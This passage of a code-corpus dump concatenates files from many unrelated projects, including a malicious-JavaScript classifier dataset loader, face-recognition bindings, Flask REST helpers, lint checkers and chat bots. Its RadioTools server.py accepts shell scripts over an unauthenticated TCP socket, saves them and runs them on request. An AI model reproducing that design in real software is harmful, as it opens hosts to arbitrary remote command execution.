except Exception as e2:
try:
with open("C:\\Users\\17862\\OneDrive\\Desktop\\Datasets\\malicious_js\\" + file + ".js", "w", encoding="latin1") as f:
f.writelines(javascript)
except Exception as e3:
return False
return True
for file in os.listdir():
file_path = f"{path}\{file}"
#print(file_path)
read_File(file_path, file)
```
#### File: AntiJacker/models/dataset.py
```python
import tensorflow as tf
import matplotlib.pyplot as plt
from tensorflow.keras import datasets, layers, models, losses
import numpy as np
import matplotlib.pyplot as plt
import os
import cv2
from tqdm import tqdm
import random
import pickle
DATADIR = "/home/jason/projects/AntiJacker/hilbert"
CATEGORIES = ["benign", "malicious"]
X_IMG_SIZE = 32
Y_IMG_SIZE = 32
training_data = []
def create_training_data():
for category in CATEGORIES:
path = os.path.join(DATADIR,category) # create path
class_num = CATEGORIES.index(category) # get the classification (0 or a 1). 0=benign 1=malicious
for img in tqdm(os.listdir(path)):
try:
img_array = cv2.imread(os.path.join(path,img) ,cv2.IMREAD_GRAYSCALE) # convert to array
new_array = cv2.resize(img_array, (X_IMG_SIZE, Y_IMG_SIZE)) # resize to normalize data size
training_data.append([new_array, class_num]) # add this to our training_data
except Exception as e: # in the interest in keeping the output clean...
pass
#except OSError as e:
# print("OSErrroBad img most likely", e, os.path.join(path,img))
#except Exception as e:
# print("general exception", e, os.path.join(path,img))
print(len(training_data))
random.shuffle(training_data)
x = []
y = []
for sample in training_data[:30]:
print(sample[1])
for features, label in training_data:
x.append(features)
y.append(label)
x = np.array(x).reshape(-1, X_IMG_SIZE, Y_IMG_SIZE, 1)
pickle_out = open("X.pickle", "wb")
pickle.dump(x, pickle_out)
pickle_out.close()
pickle_out = open("Y.pickle", "wb")
pickle.dump(y, pickle_out)
pickle_out.close()
def load_training_data():
if (os.path.exists("X.pickle") is False) or (os.path.exists("Y.pickle") is False):
create_training_data()
pickle_in = open("X.pickle","rb")
X = pickle.load(pickle_in)
pickle_in = open("Y.pickle","rb")
Y = pickle.load(pickle_in)
return X, Y
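# Usage sketch (shapes follow the 32x32 grayscale settings above):
#   X, Y = load_training_data()   # X: (n, 32, 32, 1) uint8, Y: 0/1 labels
#   X = X / 255.0                 # typical normalization before training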
``` |
{
"source": "541736690/icpc-book",
"score": 3
} |
#### File: codes/old_template/math_pell.py
```python
import math

def pell(n):
p1 = q0 = h1 = 1
p0 = q1 = g1 = 0
a2 = int(math.floor(math.sqrt(n)+1e-7))
if a2*a2 == n:
return (-1, -1)
ai = a2
ii = 1
while True:
ii += 1
g1 = -g1 + ai*h1
        h1 = (n - g1*g1)//h1
p0, p1 = p1, ai*p1 + p0
q0, q1 = q1, ai*q1 + q0
        ai = (g1 + a2)//h1
if p1*p1 - n*q1*q1 == 1:
            print(ii)
return (p1, q1)
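# Worked example: pell(2) walks the continued fraction of sqrt(2)
# (convergents 1/1, 3/2, ...) and returns (3, 2), since 3^2 - 2*2^2 = 1.
# pell(4) returns (-1, -1) because 4 is a perfect square.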
``` |
{
"source": "544146/clipsync-new",
"score": 2
} |
#### File: 544146/clipsync-new/main.py
```python
import praw
import yaml
import time
import logging
from praw.reddit import Comment
from reddit.src.handleComment import handleComment
logging.basicConfig(filename='debug.log',
level=logging.DEBUG,
format='%(asctime)s - %(name)s - %(threadName)s - %(levelname)s - %(message)s')
POLLING_TIME = 5
# # todo: use database for caching and validating vs existing requests
# # todo: alternate host.docker.internal/localhost based on docker/local
# database = pymongo.MongoClient("host.docker.internal", 27017).clipsync
def init_praw():
praw_config = config.get('praw')
return praw.Reddit(
username=praw_config.get('username'),
        password=praw_config.get('password'),
client_id=praw_config.get('client_id'),
client_secret=praw_config.get('client_secret'),
user_agent=praw_config.get('user_agent')
)
if __name__ == "__main__":
config = yaml.safe_load(open("config.yml"))
reddit = init_praw()
subreddits = config.get('subreddits')
# todo: test that this works with large number of subreddits
subredditsUnion = "+".join(subreddits)
botUsername = config.get('praw').get('username')
# todo: cache these in a database rather than memory
seenComments = set()
while True:
try:
for comment in reddit.subreddit(subredditsUnion).comments(limit=100):
if comment.id not in seenComments:
seenComments.add(comment.id)
try:
reply = handleComment(comment, botUsername)
except Exception as e:
logging.error(e)
for mention in reddit.inbox.mentions(limit=100):
if mention.id not in seenComments and isinstance(mention, Comment):
seenComments.add(mention.id)
try:
reply = handleComment(mention, botUsername)
except Exception as e:
logging.error(e)
if (len(seenComments)) > 2000:
seenComments.clear()
print(len(seenComments))
time.sleep(POLLING_TIME)
print("polling again.")
except Exception as e:
logging.error(e)
``` |
{
"source": "5455945/SeetaFaceEngine",
"score": 2
} |
#### File: python/pyseeta/identifier.py
```python
import copy as cp
import os
import sys
from ctypes import *
from ctypes.util import find_library
import numpy as np
from .common import _Face, _Image, _LandMarks
from .config import get_identifier_library
lib_path = find_library('seeta_fi_lib')
if lib_path is None:
lib_path = get_identifier_library()
identi_lib = cdll.LoadLibrary(lib_path)
c_float_p = POINTER(c_float)
identi_lib.get_face_identifier.restype = c_void_p
identi_lib.get_face_identifier.argtypes = [c_char_p]
identi_lib.extract_feature_with_crop.restype = c_float_p
identi_lib.extract_feature_with_crop.argtypes = [c_void_p, POINTER(_Image), POINTER(_LandMarks)]
identi_lib.crop_face.restype = POINTER(_Image)
identi_lib.crop_face.argtypes = [c_void_p, POINTER(_Image), POINTER(_LandMarks)]
identi_lib.extract_feature.restype = c_float_p
identi_lib.extract_feature.argtypes = [c_void_p, POINTER(_Image)]
identi_lib.calc_similarity.restype = c_float
identi_lib.calc_similarity.argtypes = [c_void_p, c_float_p, c_float_p]
identi_lib.free_feature.restype = None
identi_lib.free_feature.argtypes = [c_float_p]
identi_lib.free_image_data.restype = None
identi_lib.free_image_data.argtypes = [POINTER(_Image)]
identi_lib.free_identifier.restype = None
identi_lib.free_identifier.argtypes = [c_void_p]
class Identifier(object):
""" Class for Face identification
"""
def __init__(self, model_path=None):
if model_path is None:
model_path = '../model/seeta_fr_v1.0.bin'
assert os.path.isfile(model_path) is True, 'No such file!'
byte_model_path = model_path.encode('utf-8')
self.identifier = identi_lib.get_face_identifier(byte_model_path)
def crop_face(self, image, landmarks):
""" Crop face image from original image
Args:
image: a color image
landmarks: a list of point (x,y), length is five
Returns:
a numpy array image
"""
# handle pillow image
if not isinstance(image, np.ndarray):
image = np.array(image)
# prepare image data
image_data = _Image()
image_data.height, image_data.width = image.shape[:2]
image_data.channels = 1 if len(image.shape) == 2 else image.shape[2]
image_data.data = image.ctypes.data
# prepare landmarks
marks_data = _LandMarks()
for i in range(5):
marks_data.x[i], marks_data.y[i] = landmarks[i]
# call crop face function
crop_data = identi_lib.crop_face(self.identifier, byref(image_data), byref(marks_data))
# read crop data
contents = crop_data.contents
crop_shape = (contents.height, contents.width, contents.channels)
nb_pixels = np.product(crop_shape)
byte_data = cast(contents.data, POINTER(c_ubyte))
byte_data = (c_ubyte * nb_pixels)(*byte_data[:nb_pixels])
image_crop = np.fromstring(byte_data, dtype=np.uint8).reshape(crop_shape)
# free crop data
identi_lib.free_image_data(crop_data)
return image_crop
def extract_feature(self, image):
""" Extract feature of cropped face image
Args:
image: a color image
Returns:
a list of float, the length is 2048
"""
# handle pillow image
if not isinstance(image, np.ndarray):
image = np.array(image)
# prepare image data
image_data = _Image()
image_data.height, image_data.width = image.shape[:2]
image_data.channels = 1 if len(image.shape) == 2 else image.shape[2]
image_data.data = image.ctypes.data
# call extract_feature function
root = identi_lib.extract_feature(self.identifier, byref(image_data))
# read feature
feat = root[:2048]
# free feature
identi_lib.free_feature(root)
return feat
def extract_feature_with_crop(self, image, landmarks):
""" Extract feature of face
Args:
image: a color image
landmarks: a list of point (x,y), length is five
Returns:
a list of float, the length is 2048
"""
# handle pillow image
if not isinstance(image, np.ndarray):
image = np.array(image)
# prepare image data
image_data = _Image()
image_data.height, image_data.width = image.shape[:2]
image_data.channels = 1 if len(image.shape) == 2 else image.shape[2]
image_data.data = image.ctypes.data
# prepare landmarks
marks_data = _LandMarks()
for i in range(5):
marks_data.x[i], marks_data.y[i] = landmarks[i]
# call extract_feature_with_crop function
root = identi_lib.extract_feature_with_crop(self.identifier, byref(image_data), byref(marks_data))
# read feature
feat = root[:2048]
# free feature
identi_lib.free_feature(root)
return feat
def calc_similarity(self, featA, featB):
""" Calculate similarity of 2 feature
Args:
featA: a list of float, the length is 2048
featB: a list of float, the length is 2048
Returns:
            a float: the similarity score of the two features
"""
# prepare feature array
feat_a = (c_float * 2048)(*featA)
feat_b = (c_float * 2048)(*featB)
# call calc_similarity function
similarity = identi_lib.calc_similarity(self.identifier, feat_a, feat_b)
return similarity
def release(self):
"""
release identifier memory
"""
identi_lib.free_identifier(self.identifier)
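# Usage sketch (model path and landmark points are illustrative):
#   identifier = Identifier('../model/seeta_fr_v1.0.bin')
#   feat_a = identifier.extract_feature_with_crop(img_a, landmarks_a)
#   feat_b = identifier.extract_feature_with_crop(img_b, landmarks_b)
#   score = identifier.calc_similarity(feat_a, feat_b)
#   identifier.release()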
``` |
{
"source": "54696d654a6f6c74/RadioTools",
"score": 2
} |
#### File: RadioTools/server/server.py
```python
import socket
from time import sleep
import stat
from os import listdir, chmod
from subprocess import run
from datetime import datetime
def_bytesize = 32
byte_order = "little"  # little-endian
def log(message):
logfile = open("LOG", "a+")
print(message)
logfile.write(message + "\n")
logfile.close()
log("Initilized on: " + str(datetime.now()))
writer = open("HOST", 'w')
local_ip = socket.gethostbyname(socket.gethostname())
if "127." in local_ip:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect(("192.168.0.1", 69))
local_ip = sock.getsockname()[0]
writer.write(local_ip)
writer.close()
# splitlines() drops the trailing newline
# that file reads keep at the end of each line
reader = open("HOST", 'r')
HOST = reader.read().splitlines()[0]
reader.close()
reader = open("PORT", 'r')
PORT = int(reader.read())
reader.close()
reader = open("CMD_PATH", 'r')
CMD_PATH = reader.read().splitlines()[0]
reader.close()
all_commands = None
def load_commands():
global all_commands
all_commands = listdir(CMD_PATH)
def send_big_packet(target, packet: bytearray):
packet_len = len(packet)
packet_size = packet_len.to_bytes(int(def_bytesize / 8), byte_order)
target.sendall(packet_size)
target.sendall(packet)
def create_command_file(data: str, name: str):
name = name.rstrip('\x00')
path = CMD_PATH + "/" + name + ".sh"
file = open(path, 'w')
file.write(data)
file.close()
chmod(path, stat.S_IRWXU)
def call_command(cmd: str) -> bytearray:
cmd = cmd.rstrip('\x00')
path = CMD_PATH + "/" + cmd + ".sh"
result = run(["sh", path], capture_output=True)
if result.stderr != b'':
return (result.stdout + result.stderr)
else:
return result.stdout
def create_command_request(conn):
with conn:
cmd_file_size = int.from_bytes(
conn.recv(int(def_bytesize / 8)),
byte_order)
cmd_file = conn.recv(cmd_file_size)
cmd_file_name = conn.recv(def_bytesize)
conn.sendall(b'K')
create_command_file(cmd_file.decode(), cmd_file_name.decode())
def get_commands_request(conn):
with conn:
packet = bytearray('\n'.join(all_commands), "utf-8")
send_big_packet(conn, packet)
def call_command_request(conn):
with conn:
cmd = conn.recv(def_bytesize)
out = call_command(cmd.decode())
send_big_packet(conn, out)
log(out.decode())
log("Starting server on: " + HOST + ":" + str(PORT))
delay = 10
while True:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
load_commands()
sock.bind((HOST, PORT))
sock.listen()
log("Succsess, now listening...")
while True:
conn, addr = sock.accept()
log("Connected by: " + str(addr[0]))
req = conn.recv(1).decode()
log("Recieved: " + req)
if req == 'g':
get_commands_request(conn)
elif req == 'n':
create_command_request(conn)
elif req == 'x':
call_command_request(conn)
except OSError:
log("OS error on host, will reinit in " + str(delay) + " sec...")
sleep(delay)
continue
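# Client-side protocol sketch, mirroring the handlers above:
#   b'g' -> receive a 4-byte little-endian size, then that many bytes of a
#           newline-separated command list
#   b'x' + 32-byte command name -> receive length-prefixed command output
#   b'n' + 4-byte size + script bytes + 32-byte name -> receive b'K'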
``` |
{
"source": "54696d654a6f6c74/sleepful",
"score": 3
} |
#### File: sleepful/Behavior/Indexable.py
```python
from flask import Blueprint, Response
from Behavior import Behavior
from DataHandler import DataHandler
class Indexable(Behavior):
"""
Behavior for data that can be accessed
via enumerable indices
"""
def __init__(self, route: str, data_handler: type[DataHandler], **args):
self.data_handler = data_handler
self.route = route
self.fields = args["fields"]
def get_data_for_index(self, index: int):
data_dict = {}
with self.data_handler(self.route) as handler:
try:
data_dict = handler.get_data_fields(index, self.fields)
except AttributeError:
return Response(status = 404)
return data_dict
def get_data_for_item(self, index: int, file_name: str):
data = {}
try:
with self.data_handler(self.route) as handler:
data = handler.get_data_field(index, file_name)
except FileNotFoundError:
return Response(status = 404)
return data
def _bind(self, bp: Blueprint):
bp.add_url_rule("/<int:index>",
view_func = self.get_data_for_index,
methods = ['GET']
)
bp.add_url_rule("/<int:index>/<string:file_name>",
view_func = self.get_data_for_item,
methods = ['GET']
)
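# Example requests (sketch; the URL prefix depends on where the blueprint is mounted):
#   GET /<prefix>/3        -> all configured fields of entry 3
#   GET /<prefix>/3/title  -> only the "title" field of entry 3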
```
#### File: sleepful/Behavior/Updateable.py
```python
from .Indexable import Indexable
from flask import Response, Blueprint, request
from json import dumps
class Updateable(Indexable):
def update_file(self, file_name: str, index: int) -> Response:
data = request.get_json()
data_to_write = dumps(data[file_name])
try:
with self.data_handler(self.route) as handler:
handler.update_data(index, file_name, data_to_write)
except FileNotFoundError:
return Response(status = 404)
return Response(status = 200)
def update_all_files(self, index: int) -> Response:
data = request.get_json()
try:
with self.data_handler(self.route) as handler:
handler.update_multiple(index, self.fields, data)
except FileNotFoundError:
return Response(status = 404)
return Response(status = 200)
def _bind(self, bp: Blueprint):
bp.add_url_rule("/<int:index>",
view_func = self.update_all_files,
methods = ['PUT']
)
bp.add_url_rule("/<int:index>/<string:file_name>",
view_func = self.update_file,
methods = ['PUT']
)
super()._bind(bp)
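# Example requests (sketch; the URL prefix depends on where the blueprint is mounted):
#   PUT /<prefix>/3        with a JSON body containing every configured field -> update them all
#   PUT /<prefix>/3/title  with a JSON body like {"title": "new value"}       -> update one field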
```
#### File: DataHandler/Filesys/FilesysData.py
```python
from DataHandler import DataHandler
from json import load, dump, dumps
from os.path import isdir, isfile
from os import listdir, mkdir
from shutil import rmtree
class FilesysData(DataHandler):
def __init__(self, root_path: str):
self.root = root_path
def __enter__(self):
return self
def __exit__(self, exec_type, exec_value, traceback):
pass
def get_data_field(self, index: int, field_name: str) -> dict:
file = self._open_file(f"{str(index)}/{field_name}")
data = load(file)
file.close()
return data
def get_data_fields(self, index: int, fields: list, sort_data: bool = False) -> dict:
data = {}
for file_name in fields:
file = self._open_file(f"{str(index)}/{file_name}")
data[file_name] = load(file)
file.close()
        if sort_data:
            # note: sorted(data) on a dict would return only its keys, so sort the items instead
            return dict(sorted(data.items()))
return data
def get_all_entry_indices(self, sort_data: bool = True) -> list:
all_entries = self._get_files(sort_data = sort_data)
return all_entries
def update_data(self, index: int, field_name: str, payload: str):
file = self._open_file(f"{str(index)}/{field_name}", 'w')
file.write(payload)
file.close()
def update_multiple(self, index: int, fields: list, payload: dict):
path = str(index)
for file_name in fields:
target = self._open_file(f"{path}/{file_name}", 'w')
target.write(dumps(payload[file_name]))
target.close()
def new_data(self, payload: dict):
        files = self._get_files()
        num_files = len(files)
        path = None
        if num_files > 0:
            # folder names are sorted lexicographically, so pick the numeric maximum explicitly
            path = f"{self.root}/{max(int(name) for name in files) + 1}"
else:
path = f"{self.root}/1"
mkdir(path)
for file, data in payload.items():
writer = open(f"{path}/{file}.json", "w+")
dump(data, writer)
writer.close()
def remove_data(self, index: int):
path = f"{self.root}/{index}"
rmtree(path)
def _open_file(self, file_path: str, action: str = 'r'):
path = f"{self.root}/{file_path}.json"
if not isfile(path):
raise AttributeError("The provided path does not resolve to a file")
return open(path, action)
def _get_files(self, folder_path: str = "", sort_data: bool = True) -> list:
path = f"{self.root}/{folder_path}"
if not isdir(path):
raise AttributeError("The provided path does not resolve to a folder")
files = listdir(path)
if sort_data:
files = sorted(files)
return files
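# Example usage (sketch): entries live in numbered folders under the root path;
# "example_root" is a hypothetical folder that must already exist.
if __name__ == "__main__":
    handler = FilesysData("example_root")
    handler.new_data({"title": "hello", "body": "world"})
    print(handler.get_data_field(1, "title"))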
```
#### File: DataHandler/Meta/DataHandler.py
```python
from abc import ABC, abstractmethod
class DataHandler(ABC):
@abstractmethod
def __init__(self, root_path: str):
...
@abstractmethod
def __enter__(self):
...
@abstractmethod
def __exit__(self, exec_type, exec_value, traceback):
...
@abstractmethod
def get_data_field(self, index: int, field_name: str) -> dict:
...
def get_data_fields(self, index: int, fields: list, sort_data: bool = False) -> dict:
...
def get_all_entry_indices(self, sort_data: bool = True) -> list:
...
@abstractmethod
def update_data(self, index: int, field_name: str, payload: str):
...
@abstractmethod
def update_multiple(self, index: int, fields: list, payload: dict):
...
@abstractmethod
def new_data(self, payload: dict):
...
@abstractmethod
def remove_data(self, index: int):
...
``` |
{
"source": "549654033/RDHelp",
"score": 2
} |
#### File: PythonACE/fuzz/check_no_tabs.py
```python
import _types
type_list = _types.source_files + _types.header_files + _types.inline_files + _types.idl_files
from sys import stderr
import re
regex = re.compile ("\t")
error_message = ": error: contains tab characters\n"
from _generic_handler import generic_handler_no_exceptions
def handler (file_name, file_content):
return generic_handler_no_exceptions (regex, error_message, file_name, file_content)
```
#### File: PythonACE/fuzz/_generic_handler.py
```python
from sys import stderr
import _warning_handler
def generic_handler (regex, begin_exclude, end_exclude, error_message, file_name, file_content, warn = False):
retval = 0
if regex.search (file_content) != None:
# We have a potential violation, lets check
lines = file_content.splitlines ()
exclusion = False
for line in range (len (lines)):
if begin_exclude.search (lines[line]) != None:
exclusion = True
elif end_exclude.search (lines[line]) != None:
exclusion = False
elif (exclusion == False) and (regex.search (lines[line]) != None):
# Violation!
msg = file_name + ':' + str (line + 1) + error_message
if not warn:
stderr.write (msg)
retval = 1
else:
handler = _warning_handler.Warning_Handler.getInstance ()
handler.add_warning (msg)
return retval
def generic_handler_no_exceptions (regex, error_message, file_name, file_content, warn = False):
retval = 0
if regex.search (file_content) != None:
# We have a potential violation, lets check
lines = file_content.splitlines ()
for line in range (len (lines)):
if regex.search (lines[line]) != None:
msg = file_name + ':' + str (line + 1) + error_message
# Violation!
if not warn:
stderr.write (msg)
retval = 1
else:
                    _warning_handler.Warning_Handler.getInstance ().add_warning (msg)
return retval
```
#### File: PythonACE/fuzz/__init__.py
```python
file_type_handlers = dict ()
def register_handler (module):
for item in module.type_list:
if file_type_handlers.has_key (item):
file_type_handlers[item].append (module.handler)
else:
handlers = list ()
handlers.append (module.handler)
file_type_handlers[item] = handlers
import re
extension_re = re.compile(".+\.([^.]+)$")
# The following is the initialization logic that is executed
# when the fuzz module is loaded
from os import listdir, chdir, getcwd
from sys import stderr, path
oldwd = getcwd ()
try:
# The following is a trick to get the directory THIS SCRIPT - note, not necessarily the CWD -
# is located. We use this path later to load all of the available fuzz checks.
import _path
script_path = str (_path).split ()[3][1:-11]
if script_path == "":
script_path = "."
chdir (script_path)
path.append (getcwd ())
files = listdir (".")
modules = list ()
# We need to import the warning handler here. If we use a traditional import elsewhere,
# we get all kinds of problems with the warning_handler being imported twice - once as
# fuzz._warning_handler and again as _warning_handler - making the singleton instances
# NOT the same.
_warning_handler = __import__ ("_warning_handler")
Warning_Handler = _warning_handler.Warning_Handler
STDERR = _warning_handler.STDERR
MAILER = _warning_handler.MAILER
for item in files:
if (item[0] != '_') and (item[-3:] == ".py"):
print "Registering " + item [:-3]
try:
module = __import__ (item[:-3])
register_handler (module)
except:
stderr.write ("FUZZ ERROR: Unable to load the " + item[:-3] + " module, please notify the build czar\n")
finally:
chdir (oldwd)
def fuzz_check (file_name, file_content):
# If the user of the module has not instanciated the warning handler,
# lets do it here
if not Warning_Handler._isInstantiated ():
Warning_Handler.getInstance (STDERR)
# get the file extension
ext_match = extension_re.search (file_name)
if ext_match == None:
# we don't have no stinking file extension!
ext = ""
else:
ext = ext_match.group (1)
retval = 0
if file_type_handlers.has_key (ext):
for handler in file_type_handlers[ext]:
            try: # We don't want one misbehaving handler to screw up the whole system
retval += handler (file_name, file_content)
except:
stderr.write ("An unknown exception was thrown while trying to run one of the handlers\n")
# Run the generic handlers
for handler in file_type_handlers["*"]:
        try: # We don't want one misbehaving handler to screw up the whole system
retval += handler (file_name, file_content)
except:
stderr.write ("An unknown exception was thrown while trying to run one of the handlers\n")
return retval
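# Example usage (sketch): run every registered check against a single file and
# report the number of violations found.
if __name__ == "__main__":
    from sys import argv
    reader = open (argv[1], 'r')
    content = reader.read ()
    reader.close ()
    stderr.write (str (fuzz_check (argv[1], content)) + " violation(s) found\n")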
```
#### File: PythonACE/fuzz/inline.py
```python
from _types import inline_files
type_list = inline_files
from sys import stderr
import re
regex = re.compile ("(\s|^)+inline\s+")
begin_exclude = re.compile ("FUZZ\: disable check_for_inline")
end_exclude = re.compile ("FUZZ\: enable check_for_inline")
error_message = ": error: contains a C++ inline keyword, instead of ACE_INLINE\n"
from _generic_handler import generic_handler
def handler (file_name, file_content):
return generic_handler (regex, begin_exclude, end_exclude, error_message, file_name, file_content)
```
#### File: PythonACE/fuzz/newline.py
```python
type_list = ["cpp", "h", "inl", "html", "idl", "pl"]
import re
from sys import stderr
regex = re.compile ("\n\Z")
def handler (file_name, file_content):
if regex.search (file_content) == None:
stderr.write (file_name + ":0: error: " + file_name + " lacks a newline at the end of the file.\n")
return 1
else:
return 0
```
#### File: PythonACE/fuzz/noncvs.py
```python
type_list = ["icc", "ncb", "opt", "zip", "dsw",
"vcproj", "dsw", "bor", "vcp", "pdb",
"o", "ilk", "pyc", "so", "dll", "lib" ]
from sys import stderr
def handler (file_name, file_content):
stderr.write (file_name + ":0: error: This file should not be checked into the repository\n")
return 1
```
#### File: PythonACE/fuzz/streams_include.py
```python
import _types
type_list = _types.source_files +_types. header_files + _types.inline_files
import re
regex = re.compile ("^\s*#\s*include\s*(\/\*\*\/){0,1}\s*\"ace\/streams\.h\"")
begin_exclude = re.compile ("FUZZ\: disable check_for_streams_include")
end_exclude = re.compile ("FUZZ\: enable check_for_streams_include")
error_message = ": warning: expensive ace/streams.h included; consider ace/iosfwd.h\n"
from _generic_handler import generic_handler
def handler (file_name, file_content):
return generic_handler (regex, begin_exclude,
end_exclude, error_message,
file_name, file_content, True)
``` |
{
"source": "54adana/News-Highlights",
"score": 3
} |
#### File: News-Highlights/app/request.py
```python
from app import app
import urllib.request,json
from .models import news
News = news.News
# Getting api key
api_key = app.config['NEWS_API_KEY']
#Getting the news base url
base_url = app.config["NEWS_API_BASE_URL"]
def get_news(category):
'''
Function that gets the json response to our url request
'''
get_news_url = base_url.format(category, api_key)
with urllib.request.urlopen(get_news_url) as url:
get_news_data = url.read()
get_news_response = json.loads(get_news_data)
news_results = None
if get_news_response['articles']:
news_results_list = get_news_response['articles']
news_results = process_results(news_results_list)
return news_results
def process_results(news_list):
'''
Function that processes the news result and transform them to a list of Objects
Args:
news_list: A list of dictionaries that contain news details
Returns :
news_results: A list of news objects
'''
news_results = []
for news_item in news_list:
source = news_item.get('source')
title = news_item.get('title')
description = news_item.get('description')
poster = news_item.get('urlToImage')
url = news_item.get('url')
# category = news_item.get('category')
news_object = News(source, title, description, poster, url)
news_results.append(news_object)
return news_results
def get_News(id):
get_news_details_url = base_url.format(id,api_key)
with urllib.request.urlopen(get_news_details_url) as url:
news_details_data = url.read()
news_details_response = json.loads(news_details_data)
news_object = None
if news_details_response:
id = news_details_response.get('id')
title = news_details_response.get('title')
        description = news_details_response.get('description')
poster = news_details_response.get('poster')
news_object = News(id,title, description,poster,url)
    return news_object
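# Example usage (sketch): requires the Flask app config above to provide a valid
# NEWS_API_KEY and NEWS_API_BASE_URL; the attribute names on News are assumed
# from the constructor arguments used in process_results.
if __name__ == '__main__':
    for article in get_news('sports') or []:
        print(article.title, '->', article.url)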
``` |
{
"source": "54adana/password-locker",
"score": 4
} |
#### File: 54adana/password-locker/credentials_test.py
```python
import unittest # Importing the unittest module
from credentials import User,Credentials # Importing the credentials class
import pyperclip
class TestUser(unittest.TestCase):
def setUp(self):
        self.new_user = User("Yvette","Adana","0786574531","<EMAIL>") # create a test user object
def test_init(self):
self.assertEqual(self.new_user.first_name,"Yvette")
self.assertEqual(self.new_user.last_name,"Adana")
self.assertEqual(self.new_user.phone_number,"0786574531")
self.assertEqual(self.new_user.email,"<EMAIL>")
def test_save_user(self):
'''
test_save_user test case to test if the user object is saved into
the user list
'''
self.new_user.save_user()
# saving the new user
self.assertEqual(len(User.user_list),1)
# setup and class creation up here
def tearDown(self):
'''
tearDown method that does clean up after each test case has run.
'''
User.user_list = []
def test_delete_user(self):
'''
test_delete_user to test if we can remove a user from our user list
'''
self.new_user.save_user()
test_user =("Yvette","Adana","0786574531","<EMAIL>") # user
# test_user.save_user()
class TestCredentials(unittest.TestCase):
def setUp(self):
self.new_credentials =Credentials ("facebook","gift254","<NAME>")
def test_init(self):
self.assertEqual(self.new_credentials.account,"facebook")
        self.assertEqual(self.new_credentials.password,"gift254")
self.assertEqual(self.new_credentials.user_name,"<NAME>")
def test_save_credentials(self):
self.new_credentials.save_credentials()
# saving the new credentials
self.assertEqual(len(Credentials.credentials_list),1)
# setup and class creation up here
def tearDown(self):
Credentials.credentials_list = []
# other test cases here
def test_save_multiple_credentials(self):
self.new_credentials.save_credentials()
test_credentials = Credentials("facebook","gift254","<NAME>") # new credentials
# More tests above
def test_delete_credentials(self):
'''
test_delete_credentials to test if we can remove a credentials from our credentials list
'''
self.new_credentials.save_credentials()
test_credentials = Credentials("facebook","gift254","<NAME>") # new credentials
test_credentials.save_credentials()
def test_find_credentials_by_password(self):
'''
        test to check if we can find a credentials entry by password and display its information
'''
self.new_credentials.save_credentials()
test_credentials = Credentials("facebook","gift254","<NAME>") # new credentials
test_credentials.save_credentials()
# found_credentials = Credentials.find_by_password("<PASSWORD>")
# self.assertEqual(found_credentials.credentials,test_credentials.password)
def test_credentials_exists(self):
'''
test to check if we can return a Boolean if we cannot find the credentials.
'''
self.new_credentials.save_credentials()
test_credentials = Credentials("facebook","gift254","<NAME>") # new contact
test_credentials.save_credentials()
credentials_exists = Credentials.credentials_exist("gift254")
self.assertTrue(credentials_exists)
def test_display_all_credentials(self):
'''
method that returns a list of all credentials saved
'''
self.assertEqual(Credentials.display_credentials(),Credentials.credentials_list)
# def test_copy_email(self):
# '''
# Test to confirm that we are copying the email address from a found credential
# '''
# self.new_credentials.save_credentials()
# Credentials.copy_email("<EMAIL>")
# self.assertEqual(self.new_credentials.email,pyperclip.paste())
def test_display_credentials(self):
'''
method that returns a list of all credentials saved
'''
self.assertEqual(Credentials.display_credentials(),Credentials.credentials_list)
if __name__ == '__main__':
unittest.main() # self.assertEqual(len(Credentials.credentials_list))
``` |
{
"source": "54bp6cl6/MiaAndMax",
"score": 2
} |
#### File: MiaAndMax/controller/default.py
```python
from controller.base import Controller
from service.reply import ReplyService
from service.user import UserService
from view import (
base
)
from linebot.models import (
FollowEvent, UnfollowEvent, TextMessage
)
class DefaultController(Controller):
def __init__(self, replyService: ReplyService):
super().__init__(replyService)
def handleMessageEvent(self, params):
event = params["event"]
if isinstance(event.message, TextMessage):
            if event.message.text == "寶欸我愛尼!!!":  # roughly: "Baby, I love you!!!"
                pass  # special-case reply not implemented in this snippet
            else:
                pass
```
#### File: MiaAndMax/db/firestoreService.py
```python
from google.cloud import firestore
class FirestoreService:
def __init__(self):
self.db = firestore.Client()
def getChannelVars(self):
'''
Get Line Channel Access Token and Secret,
return (access_token, secret).
'''
config = self.db.collection(u'linebot').document(u'config').get().to_dict()
return (config["LINE_CHANNEL_ACCESS_TOKEN"], config["LINE_CHANNEL_SECRET"])
def getUserId(self, username: str) -> str | None:
users = self.db.collection(u'linebot').document(u'user').get().to_dict()
return users[username] if username in users else None
def setUserId(self, username: str, user_id: str):
self.db.collection(u'linebot').document(u'user').update({
username: user_id
})
def deleteUserId(self, username: str):
self.db.collection(u'linebot').document(u'user').update({
username: firestore.DELETE_FIELD
})
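# Example usage (sketch): requires Google Cloud credentials with Firestore access
# (e.g. GOOGLE_APPLICATION_CREDENTIALS) and the linebot/config document to exist.
if __name__ == '__main__':
    service = FirestoreService()
    token, secret = service.getChannelVars()
    print('channel config loaded:', bool(token and secret))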
```
#### File: 54bp6cl6/MiaAndMax/router.py
```python
import sys
from controller.base import Controller
from controller.miaBinding import MiaBindingController
from db.firestoreService import FirestoreService
from service.reply import ReplyService
from service.user import UserService
from view import base
from linebot import LineBotApi
class Router:
def __init__(self, bot: LineBotApi, dbService: FirestoreService):
self.bot = bot
self.dbService = dbService
self.middlewares = [
self.useLinebotErrorMessage,
self.useUserService,
self.useMiaBinding,
self.useContext,
self.useDefaultReply,
]
self.replyService = ReplyService(self.bot)
def route(self, event):
params = {
"event": event,
}
self.nextMiddleware(params)
def nextMiddleware(self, params):
if len(self.middlewares) > 0:
next = self.middlewares.pop(0)
print("Into:", next.__name__, "middleware")
next(params)
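            # Note: pop(0) consumes the shared middleware list, so this Router
            # instance can only route a single event as written; rebuild or copy
            # the list per event when handling multiple events.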
# ========== Middlewares ==========
def useLinebotErrorMessage(self, params):
try:
self.nextMiddleware(params)
except:
self.replyService.replyMessage(
params["event"], base.TextMessage(str(sys.exc_info())))
def useUserService(self, params):
self.userService = UserService(self.dbService, self.replyService)
self.nextMiddleware(params)
def useMiaBinding(self, params):
controller = MiaBindingController(self.replyService, self.userService)
if not controller.handleEvent(params):
self.nextMiddleware(params)
return
def useAuthentication(self, params):
if self.userService.authenticate(params["event"].source.user_id):
self.nextMiddleware(params)
else:
self.replyService.replyMessage(
params["event"], base.TextMessage("本服務只對尊貴且唯一的蘇苡甄小姐開放,謝謝。"))
def useContext(self, params):
self.nextMiddleware(params)
def useDefaultReply(self, params):
